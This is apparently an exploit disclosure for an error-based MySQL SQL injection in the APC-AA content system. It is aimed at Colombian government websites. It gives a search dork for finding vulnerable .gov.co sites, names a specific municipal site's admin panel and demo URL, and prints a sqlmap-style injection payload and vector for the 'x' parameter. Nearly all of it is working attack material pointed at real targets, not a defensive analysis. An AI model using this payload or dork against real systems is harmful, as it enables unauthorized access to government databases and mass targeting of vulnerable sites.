# Title: Colombia Government Error Based Parameter X
# Dork: inurl:apc-aa/admin/ site:gov.co
# Date: 14/12/2017
# Test: w10
# Credit: Informacion - Anonymous
## AdminPanel: http://www.viota-cundinamarca.gov.co/apc-aa/admin/index.php3
# p00F:
===
---
Parameter: x (GET)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: apc=ccx-1-&x=2625328 AND (SELECT 4094 FROM(SELECT COUNT(*),CONCAT(0x7176767171,(SELECT (ELT(4094=4094,1))),0x7171716a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
---
-- Demo:
# www.viota-cundinamarca.gov.co/noticias.shtml?apc=ccx-1-&x=2625328
=========================================================================
